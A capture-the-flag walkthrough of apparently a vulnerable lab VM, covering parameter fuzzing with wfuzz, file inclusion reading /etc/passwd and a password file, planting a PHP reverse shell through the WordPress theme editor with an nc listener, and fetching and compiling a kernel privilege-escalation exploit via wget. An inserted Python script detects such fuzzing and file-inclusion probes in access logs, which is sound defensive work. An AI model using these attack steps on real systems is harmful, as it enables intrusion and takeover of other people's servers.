********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/index.php?FUZZ=something
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000001: 200 7 L 12 W 136 Ch "@"
000000002: 200 7 L 12 W 136 Ch "00"
000000003: 200 7 L 12 W 136 Ch "01"
000000004: 200 7 L 12 W 136 Ch "02"
000000005: 200 7 L 12 W 136 Ch "03"
000000006: 200 7 L 12 W 136 Ch "1"
000000008: 200 7 L 12 W 136 Ch "100"
000000007: 200 7 L 12 W 136 Ch "10"
As we can see, the responses have 12 words, so we can add the --hw 12 parameter, which hides every response with a word count of 12.
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/index.php?FUZZ=something
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000340: 200 7 L 19 W 206 Ch "file"
Total time: 1.358470
Processed Requests: 949
Filtered Requests: 948
Requests/sec.: 698.5795
We know that there is a parameter called file. From there we can go to index.php and append ?file=location.txt to the URL, the file that secret.txt pointed us to.
This gives us secrettier360, which is used on another PHP page. Let's use gobuster to enumerate further.
gobuster
gobuster dir -u http://192.168.1.113/ -w /usr/share/wordlists/dirb/common.txt -x .php
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/image.php?secrettier360=FUZZ
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000001: 200 6 L 17 W 197 Ch "@"
000000002: 200 6 L 17 W 197 Ch "00"
000000003: 200 6 L 17 W 197 Ch "01"
000000004: 200 6 L 17 W 197 Ch "02"
000000005: 200 6 L 17 W 197 Ch "03"
000000012: 200 6 L 17 W 197 Ch "20"
000000014: 200 6 L 17 W 197 Ch "2000"
000000006: 200 6 L 17 W 197 Ch "1"
As we can see, the responses have 17 words, so we set the --hw argument to 17.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/image.php?secrettier360=FUZZ
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000256: 200 13 L 43 W 328 Ch "dev"
Total time: 1.601662
Processed Requests: 949
Filtered Requests: 948
Requests/sec.: 592.5094
We then got dev, so let's supply it in the URL.
Next we can replace dev with /etc/passwd.
We can see password.txt in the directory /home/saket, so let's replace /etc/passwd with that path.
We got a password: follow_the_ippsec
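From a defender's perspective, the two probes above (a parameter-name fuzz against index.php, then file-path values in the secrettier360 parameter of image.php) leave a recognisable trace in the web server's access log. The following Python script is an added example and not part of the original walkthrough; the log lines are constructed to mirror this traffic, and the threshold of four distinct parameter names per IP and path is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed Apache-style access log lines modelled on the traffic this
# walkthrough generates: a parameter-name fuzz against index.php followed
# by file inclusion probes against image.php. Not real captured logs.
SAMPLE_LOG = """\
192.168.1.112 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php?@=something HTTP/1.1" 200 136
192.168.1.112 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php?00=something HTTP/1.1" 200 136
192.168.1.112 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php?01=something HTTP/1.1" 200 136
192.168.1.112 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php?02=something HTTP/1.1" 200 136
192.168.1.112 - - [10/Jan/2024:10:00:02 +0000] "GET /index.php?file=something HTTP/1.1" 200 206
192.168.1.112 - - [10/Jan/2024:10:00:05 +0000] "GET /image.php?secrettier360=dev HTTP/1.1" 200 328
192.168.1.112 - - [10/Jan/2024:10:00:09 +0000] "GET /image.php?secrettier360=/etc/passwd HTTP/1.1" 200 2100
192.168.1.112 - - [10/Jan/2024:10:00:15 +0000] "GET /image.php?secrettier360=/home/saket/password.txt HTTP/1.1" 200 220
10.0.0.7 - - [10/Jan/2024:10:01:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 900
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>[^ ?]+)(?:\?(?P<query>[^ ]*))? ')
# Values that look like a filesystem path or traversal rather than a page name.
LFI_VALUE_RE = re.compile(r'(\.\./|^/(etc|home|root|var|proc)/)')
FUZZ_THRESHOLD = 4  # assumed: distinct parameter names per (ip, path) before alerting

def analyse(log_text, fuzz_threshold=FUZZ_THRESHOLD):
    """Return {'fuzzing': [(ip, path, n_params)], 'lfi': [(ip, path, param, value)]}."""
    param_names = defaultdict(set)
    lfi_hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m.group('query'):
            continue
        ip, path = m.group('ip'), m.group('path')
        for pair in m.group('query').split('&'):
            name, _, value = pair.partition('=')
            value = unquote(value)  # catch %2e%2e%2f-style encoded traversal too
            param_names[(ip, path)].add(name)
            if LFI_VALUE_RE.search(value):
                lfi_hits.append((ip, path, name, value))
    fuzzing = [(ip, path, len(names)) for (ip, path), names in param_names.items()
               if len(names) >= fuzz_threshold]
    return {'fuzzing': fuzzing, 'lfi': lfi_hits}

if __name__ == '__main__':
    for kind, hits in analyse(SAMPLE_LOG).items():
        for hit in hits:
            print(kind, hit)
```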
Reverse Shell
We found a WordPress website.
Then we go to the login page and enter the username victor and the password follow_the_ippsec.
We logged into the admin panel.
After wandering around, go to Appearance and then Theme Editor.
On the right side, there is a PHP file called secret.php.
We have a file that can be edited.
We can go to pentestmonkey and grab the PHP reverse shell file.
Copy the whole content of the file into the WordPress editor, change the IP and port, then update the file.
Before that we need to set up a listener on our machine:
nc -nlvp 4444
Then, in the browser, navigate to /wordpress/wp-content/themes/twentynineteen/secret.php.
We got a shell!
Privilege Escalation
Navigate to /home/saket and get the user flag.
Method 1
searchsploit 16.04 Ubuntu | grep Privilege
Copy it to the current directory.
Then, on our machine, we use Python to serve the file:
python -m SimpleHTTPServer
In the shell, navigate to the /tmp folder.
Then type wget 192.168.1.112:8000/45010.c
After that, type gcc 45010.c -o exploit
Then, chmod +x exploit
Run the exploit by typing ./exploit
Type /bin/bash -i to get a proper shell.
Navigate to /root, cat root.txt and get the flag.
Congratulations!
Method 2
Type sudo -l and we will get this:
Navigate to /home/saket and we will see an executable file called enc.
Nothing seems to happen. After further enumeration, we found that there is a /opt/backup/server_database directory containing a backup password.
Navigate back to the directory with the enc file and run it with sudo ./enc
We got 2 files, enc.txt and key.txt.
We first change the string ippsec to its MD5 hash, since the hint tells us to do so.
By using this tool, I managed to get the plaintext from the encrypted enc.txt:
Dont worry saket one day we will reach toour destination very soon. And if you forget your username then use your old password==> "tribute_to_ippsec"Victor,
We can see the password is tribute_to_ippsec, so let's su to the saket user account.
Then type sudo -l
Navigate to victor's directory again and type sudo /home/victor/undefeated_victor
We found out that there is no bash for the user victor, so we can type
cp /bin/bash /tmp/challenge
so that a shell is available for victor.
Run again with sudo /home/victor/undefeated_victor
Got root!
Navigate to /root and cat root.txt to get the flag!